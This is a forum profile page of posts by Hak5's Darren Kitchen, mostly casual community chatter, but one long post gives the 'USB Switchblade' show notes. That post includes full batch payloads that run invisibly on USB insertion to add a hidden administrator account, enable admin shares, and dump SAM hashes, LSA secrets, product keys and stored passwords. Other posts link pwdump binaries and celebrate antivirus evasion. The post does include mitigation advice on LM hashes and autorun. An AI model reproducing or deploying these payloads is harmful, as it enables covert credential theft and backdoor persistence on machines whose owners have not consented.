Jump to content

Darren Kitchen

Root Admin
 View Profile  See their activity

  • Posts

    4,887

  • Joined

  • Days Won

    248

 Content Type 

Everything posted by Darren Kitchen

  1. Darren Kitchen
    It wouldn't be hard to program in, but I rather like it the way it is since it's actually way more stealthy. As a systems administrator if I found that this happened on my network I could check traffic logs and possibly find the drop site that the cracker used.
  2. Darren Kitchen
    Amish's technique does not require a U3 drive. I've tested it and had it work just fine. I'm too exhausted right now to check. Amish: could you take a look and maybe explain your technique here? Thx, D
  3. Darren Kitchen
    I've actually wanted that once or twice but was never bothered to write anything. I think the usb switchblade code could be hacked to work in reverse sort of. At least it would allow for a way to do the copy operations invisibly. Not sure on initiating it, maybe a secret key combo.
  4. Darren Kitchen
    pwdump and its dependencies can be encrypted. Ill post links below to the programs. Standard Disclaimers Apply! http://www.brainkill.net/hack/pwdump.exe http://www.brainkill.net/hack/pwservice.exe http://www.brainkill.net/hack/LsaExt.dll ======================= I can verify that the latest version of symantec anti-virus corporate edition with the latest updates does not detect this now. score one for brainkill!
  5. Darren Kitchen
    From Hak5 episode 2x02, fourth segment: http://www.hak5.org/archives/138 Show notes: Most Current: http://www.hak5.org/wiki/index.php?title=E...itchblade.22.29 Wiki page: http://www.hak5.org/wiki/index.php?title=USB_Switchblade Show Notes 1.0 adapted from my CFH #437 notes: Instant USB Password Recovery Tool (The "USB Switchblade") *Further development for this project can be found on the Hak5 forums at http://www.hak5.org/forums/viewtopic.php?t=2361<br> In this segment we'll overview a few of Microsoft Window's security weaknesses and show how to build a custom USB key that will retrieve vital information from a target computer, necessary for auditing password strength. A major flaw in the way Windows stores password information is the use of the legacy LM, or LAN Manager hash. While this hash is based on DES encryption it is vulnerable to time-memory trade-off attacks due to it's poor implementation. Our custom USB key uses new U3 technology to automatically and invisibly retrieve these weak hashes within seconds of being inserted into the target computer. From here the LM hashes can be tested against a set of rainbow tables using the popular rainbowcrack software and audited for password strength. We will also cover password best practices and prevention methods for this type of attack. While the above paragraph may sound daunting at first I will break it down into human terms and explain how and why this works, and what you at can do to keep more secure passwords. Overview of weaknesses in Windows password stores The weakness that we will be exploiting is the way in which Windows stores password information. Since Windows 95 passwords have been stored in what is known as the LM, or LAN Manager hash. This hash is based on DES encryption which is a reasonably secure hash function, however the way in which Microsoft implemented it makes it easily attacked for a few reasons. First, the user's password is converted to all uppercase. Second the password is padded or truncated to 14 bytes. Next the password is split into two 7 byte halves and the values are used to create two DES keys with a constant ASCII string, resulting in two 8 byte values. Those two values are concatenated to form a 16 byte value, which is the LM hash. Basically what that all means is that your password is converted to all uppercase, split into two hashes, and stored in a DES encrypted hash. This makes the hash susceptible to brute force, or in our case, Time-Memory Trade-Off attacks, which we'll get into in a few moments. Overview of password auditing USB key The beauty of our custom password hash retrieving USB key comes from it's unique use of U3 technology. U3 is relatively new USB flash drive technology developed by U3 LLC in cooperation with Sandisk and M-Systems. More information about U3 can be found at the website http://www.u3.com It basically uses a portion of the flash drive's memory as a virtual CD-ROM drive. This allows the Windows autorun feature to work properly, enabling us to run programs as soon as the drive is inserted into a computer. The autorun feature does not work properly on standard USB flash drives so a U3 enabled USB flash drive is required to make this work. In this example we are using a U3 enabled SanDisk Cruzer Micro USB Flash Drive. This drive comes with U3 software enabling the use of applications like Skype directly from the flash drive. We will need to wipe out the U3 partition on this drive and replace it with our own payload. In this case we are using a payload developed by a Hak5 community member that goes by the name of MaxDamage. Max's payload contains a visual basic script and autorun.inf file which will be flashed onto the U3 CD-ROM partition. The autorun.inf file launches the visual basic script, which in turn runs the exploit located on the normal flash drive partition invisibly. To replace the existing U3 software on the U3 enabled SanDisk Cruizer Micro USB Flash Drive we will need two files. The LPInstaller.exe and the cruzer-autorun.iso file. Both are hosted on the www.hak5.org website and is under further development on our forums and wiki. The LPInstaller.exe is a piece of software developed by Sandisk for updating the U3 software on the flash drive. By default it will query a special website at Sandisk, download the latest U3 software, and flash the U3 partition on the USB flash drive. Since we want to install our own software we simple need to place a file named cruzer-autorun.iso in the same directory as the LPInstaller.exe program and run it. This will replace the existing U3 software with the first part of our payload. The second part of Max's payload are the scripts located on the normal partition of the USB flash drive. These are located within the hidden folders WIP/CMD/ and include dlls, visual basic scripts, and executables, all run from a batch file. The batch file, go.cmd, will be run invisibly upon drive insertion and run the various password hash recovery tools. The most important part of this toolkit is the PwDump tool which will retrieve the LM hashes from the local computer and save them to a log file on the normal flash drive partition within the /Documents/logfiles directory, with a file name based on the computer name with a .log extension. This file is created by the go.cmd file invisibly upon insertion and contains the LM hashes, as well as many other pieces of information. Further clarification on instalation procedures for the password hash retrieving USB key can be found on the hak5.org website. Overview of Time-Memory Trade-Off Time-Memory Trade-Off, or TMTO, in terms of password cracking is a procedure used to reduce the amount of computation time needed to test hashes, normally using a lookup table. The password cracking is done by comparing the password hash, in our case the LM hash, against a table of hashes and their known plaintext equivalents. The most popular table for this type of password cracking are known as Rainbow Tables, used in conjunction with a tool called Rainbow Crack. A full explanation of Time-Memory Trade-Off and Rainbow Tables are out of the scope of this article so I encourage you to read the following articles if interested: http://neworder.box.sk/newsread.php?newsid=13362 http://www.antsight.com/zsl/rainbowcrack/ http://en.wikipedia.org/wiki/Rainbow_table There are many online services for comparing LM hashes against lookup tables, such as www.plain-text.info, www.md5lookup.com, and www.rainbowcrack-online.com. However in this example we will be using our own rainbow tables with the rainbow crack tool. One of the best places to obtain a set of rainbow tables is the website http://rainbowtables.shmoo.com/ operated by the Schmoo group. We will also need the rainbow crack software available from http://www.antsight.com/zsl/rainbowcrack/ Putting the tools to use Once you have gathered the necessary tools and created your own password hash retrieving USB key using a compatible U3 enabled USB Flash Drive we can put it to use and audit our computer's password strength. The first step is to insert the USB flash drive into a Windows computer and wait a few seconds for it to be recognized. Once recognized the payload should be run automatically and invisibly, creating a log file on the flash drive in the /documents/logfiles/ directory. From here our work is done and we can safely remove the USB flash drive. From this or another computer we can open the log file containing the LM hash and run it against our rainbow tables using the rainbow crack tool. To do so we will copy the LM hash of the user's password we wish to audit from the log file into a new file named pwfile.txt and move it to the directory where we store our rainbow tables and rainbow crack tool. The command to test the hash against the tables is "rcrack *.rt -f pwfile" The rainbow crack tool will then take a few minutes to run the LM hash against our rainbow tables and display the results. If we see the password in plaintext we know that the password is weak and needs to be strengthened. Mitigation There are a few things that need to be explained about this method for password hash retrieval and cracking. First is that physical access is needed to the Windows computer for which we will be testing. Second is that the computer is logged in with administrative access. And third is that no anti-virus that would detect the payload is running. In our tests Symantec Corporate Anti-Virus was able to detect the pwdump tool in the payload and prevent it from running. Many other anti-virus solutions may do the same. Now if we are successful in using this method to retrieve the LM hash and run it against our rainbow tables and find a match the next step is to strengthen the password. To do this we must understand the limitations of the LM hash. While the LM hash may be Window's akilies heal it can easily be circumvented by two methods. First is to use a password of 15 characters or higher, which is highly recommended. For further reading on long password best practices see the following websites on pass phrases: http://www.microsoft.com/technet/community...gmt/sm1104.mspx http://www.fourmilab.ch/javascrypt/pass_phrase.html It is also worth mentioning that LM hashes can be disabled entirely on a Windows 2000 or higher computer by making a simple change to the registry. For more information on preventing Windows from storing a LM hash see the following article in the Microsoft Knowledge Base: http://support.microsoft.com/kb/299656/ As an added precaution we can also disable the Windows autorun feature. More information on that procedure can be found in this Microsoft Knowledge Base article: http://support.microsoft.com/kb/q155217 For more information on any of these topics and the MaxDamage password hash retrieving payload visit the wiki at www.hak5.org/wiki/ Related Links http://www.hak5.org http://www.u3.com http://neworder.box.sk/newsread.php?newsid=13362 http://www.antsight.com/zsl/rainbowcrack/ http://en.wikipedia.org/wiki/Rainbow_table http://www.microsoft.com/technet/community...gmt/sm1104.mspx http://www.fourmilab.ch/javascrypt/pass_phrase.html http://support.microsoft.com/kb/299656/ http://support.microsoft.com/kb/q155217 Credits: MaxDamage Amish Thinking out loud Feel free to use the wiki for development. Possibly filed under Hak5 Labs or something. Could be a good place for the pandora hack and future projects. Requirements *physical Access*usb port *autorun enabled *no anti-virus (might be able to fix this) *administrator privledges (might be able to automate system level escalation) MaxDamage's Solution 1. LoaderThis replaces the U3 partition on the Sandisk Cruizer Micro with an invisible autorun loader http://www.hak5.org/releases/2x02/switchbl...D1.0-loader.rar 2a. Payload 1.0 This payload gathers IP information, enables admin shares, adds an admin account, dumps the SAM, product keys, URL history, and LSA secrets http://www.hak5.org/releases/2x02/switchbl...1.0-payload.rar @echo off @if not exist Documents md Documents &gt;nul @if not exist Documentslogfiles md Documentslogfiles &gt;nul @echo ==================================================[Passive query bit] &gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @echo ==================================================[System info] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @ipconfig /all &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @echo ==================================================[END System info] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @echo ==================================================[Enabling Admin Shares] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters /v @AutoSharewks /t reg_dword /d 1 /f &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @echo ==================================================[END Enabling Admin Shares] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @echo ==================================================[Add an administrative User Account] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @net user /add SUPPORT_388945a1 inferno /fullname:"Microsoft Corporation Help Request" &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @net localgroup Administrators SUPPORT_388945a1 /add &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @echo MYUSER: SUPPORT_388945a1 Password: inferno &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v SUPPORT_388945a1 /t reg_dword /d 0 /f &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @echo ==================================================[END Add User] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @echo ==================================================[Dump SAM] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @.pwdump 127.0.0.1 &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @echo ==================================================[Dump END SAM] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @echo ==================================================[Dump Product Keys] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @.produkey /nosavereg /stext "Documentslogfiles%computername%_zzz.txt" /remote %computername% &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @copy Documentslogfiles%computername%* Documentslogfiles%computername%_load.log &gt;&gt; nul @del /f /q "Documentslogfiles%computername%_zzz.txt" @echo ==================================================[Dump Product Keys END] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @echo ==================================================[Dump URL History] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @cscript //nologo .DUH.vbs &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @echo ==================================================[Dump URL History] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @echo ==================================================[Dump LSA Secrets] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @.pspv.exe /stext "Documentslogfiles%computername%_LSA.log" &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 @copy Documentslogfiles%computername%* Documentslogfiles%computername%_load.log &gt;&gt; nul @del /f /q "Documentslogfiles%computername%_LSA.log" @echo ==================================================[Dump END LSA] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1 :End @exit 2b. Payload 1.1 This payload gathers IP information, dumps SAM, product keys, LSA secrets, network passwords, messenger passwords, and URL history. http://www.hak5.org/releases/2x02/switchbl...1.1-payload.rar @echo off if not exist Documents md Documents &gt;nul if not exist Documentslogfiles md Documentslogfiles &gt;nul cd wipcmd &gt;nul Echo ************************************ &gt; Documentslogfiles%computername%.log 2&gt;&amp;1 echo ***********[System info]************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 ipconfig /all &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 echo ***********[Dump SAM]*************** &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 .pwdump 127.0.0.1 &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 echo ***********[Dump Product Keys]****** &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 .produkey /nosavereg /stext "Documentslogfiles%computername%_pk.log" /remote %computername% &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_pk.log* Documentslogfiles%computername%.log &gt;&gt; nul del /f /q "Documentslogfiles%computername%_pk.log" &gt;nul Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 echo ***********[Dump LSA secrets]******* &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 .pspv.exe /stext "Documentslogfiles%computername%_LSA.log" &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_lsa.log* Documentslogfiles%computername%.log &gt;&gt; nul del /f /q "Documentslogfiles%computername%_lsa.log" &gt;nul Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 echo ***********[Dump Network PW]******** &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 .netpass.exe /stext "Documentslogfiles%computername%_np.log" &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_np.log* Documentslogfiles%computername%.log &gt;&gt; nul del /f /q "Documentslogfiles%computername%_np.log" &gt;nul Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 echo ***********[Dump messenger PW]******** &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 .mspass.exe /stext "Documentslogfiles%computername%_ms.log" &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_ms.log* Documentslogfiles%computername%.log &gt;&gt; nul del /f /q "Documentslogfiles%computername%_ms.log" &gt;nul Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 echo ***********[Dump URL History]******* &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 cscript //nologo .DUH.vbs &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 :End exit 2c. Payload 1.2 (Pwdump update from BrainKill) http://www.hak5.org/releases/2x02/switchbl...1.2-payload.rar Updates either package with a version of Pwdump that is not detected by Symantec Anti-Virus. Amish's Solution Amish's solution is similar to MaxDamage's, however it does not require a U3 compatible USB drive. It relies on a little social engineering and gathers similar data. I'll let Amish explain it in more detail.http://www.hak5.org/releases/2x02/switchbl...1.0-payload.rar
  6. Darren Kitchen
    there's not much in a name. Hak5 could have been called "kill-9" and as long as the content was the same people would be wearing "Kill-9" t-shirts instead of Hak5 t-shirts. My other advice isnt about names, rather, when it comes to online publications of any sort the golden rule, at lease in my opinion, is "don't promise, produce" Good luck! D
  7. Darren Kitchen
    Nothing to see here, move along.
  8. Darren Kitchen
    In Toronto over the weekend we stopped on the street when we saw a chopper with a helmet that read "FTW". We all laughed and I took a pic with my camera phone. Then the biker came around and we commented on the helmet. He looked at us and said "fuck the world baby". so yeah, I guess it depends on where you are between the geek <----> biker scale.
  9. Darren Kitchen
    I just need to make this very clear. That's not Wess' myspace profile. It's a fan made profile. And it should be clearly marked. Now I wish I remembered who created it. It needs to be altered so that people know it's a Wess fan page. Supposedly there's one for my floating around too. whatever.
  10. Darren Kitchen
    The F@H group was mentioned in 2x02 so hopefully it'll get a nice influx of group members. :) hopefully. I think it's a wonderful cause.
  11. Darren Kitchen
    oh by the way: http://hak5psp.libsyn.com :)
  12. Darren Kitchen

    USB Cooking

    Darren Kitchen replied to a topic in Questions

    nice find :) cant wait to show wess.
  13. Darren Kitchen
    First off I need to apologize for the late response on this matter. I just got back from our trip to Canada and hadn't been keeping up with the forums. I was not aware that Vertex-Hosting had started blocking Tor. I will have to speak to the administrator of that network and see what we can do about resolving this issue. Personally I think Tor, and metasploit for that matter, are great tools when used responsibly. In the meantime, please try connecting to our alternate server at 66.252.7.115. It's a node on the same network. They're all round robbined. And I believe even the irc.techphile.ca network has merged with ours but I haven't verified that. I've been so busy with production that I haven't had time to administrate the ever growing Hak5 network so I've had to delegate some of those responsabilities. Again, I apologize for the late response and hope that you are able to reconnect to the IRC network soon. If you have any other problems please feel free to email me directly. Thanks, Darren
  14. Darren Kitchen
    It's often safe to move $hf_mig$, $NtServicePackUninstall$, and SoftwareDistribution to another partition. Win+F 'em ;)
  15. Darren Kitchen
    fixed
  16. Darren Kitchen
    It's taken care of. Thanks to everyone who sent in. Picking the one to use was *really* though. Ok, off to Canada in a few hours.
  17. Darren Kitchen
    I'm going to contact my buddy Matt. He can rap up a storm. Maybe he can do this up, it would be an awesome special on Hak5. :)
  18. Darren Kitchen
    It would be awesome if you would throw up the source audacity (or whatever program you used) file and let others expand on it. I really like it but had a hard time hearing the lyrics, they need to be increased in volume by 100%
  19. Darren Kitchen
    I am aware of the situation and working on a solution. Thanks
  20. Darren Kitchen
    lets be honest... i think we all do i guess i should clearify before you start thinking that we're freaks. ive got 4 autographed photos from when we sent some out to VaKo and Melodic.
  21. Darren Kitchen
    ive got a stock pile of pre autographed photos
  22. Darren Kitchen
    Ok, as you are probably aware my little accident with the sheet metal has cost us some very needed time in the production department. We leave for Toronto on Wednesday so the show needs to be done and set to render on Tuesday night. We lost a day of production and have no way to make it up. So I'm calling on the community to help with a fun part of the episode. We need some voice acting for a house ad. Specifically the tshirt ad. The script is: "9 out of 10 evil servers recommend hak5 trust your technolust tshirts. get yours today before they get you! (in soviet russia)"<fast talk> "tshirts available in small through 3 XL, some assembly required, portable moon base not included, jinx dot com and its partners are not affiliated with evil server. [pause] they have servers, they're just not evil. [pause] yet" </fast talk> The above should be about 20-30 seconds. we need an mp3 of wav sent to darren@hak5.org. The best sounding one wins the spot in the episode, your name in the credits, and we'll send you out an autographed postcard of the cast. Deadline is Tuesday by 5:00 pm EDT (-5 gmt). bonus points for creative modifications to the script, and of course awesome accents.
  23. Darren Kitchen
    Saw the doc today. I go in for pre-surgery on the 5th, the the operation on the 12th. They'll be slicing my finger open through the same insision and repairing the turn tendon. I'm expected to fully recover in about 12 weeks.
  24. Darren Kitchen
    it happened while punching wess. i missed. for once paul let the camera roll. i havent checked the footage but i bet its bloody. im not sure if it will be suitable for 2x02
  25. Darren Kitchen
    Cheers Tom!!! Cant wait to get a beer w/ ya in London!
×
×
  • Create New...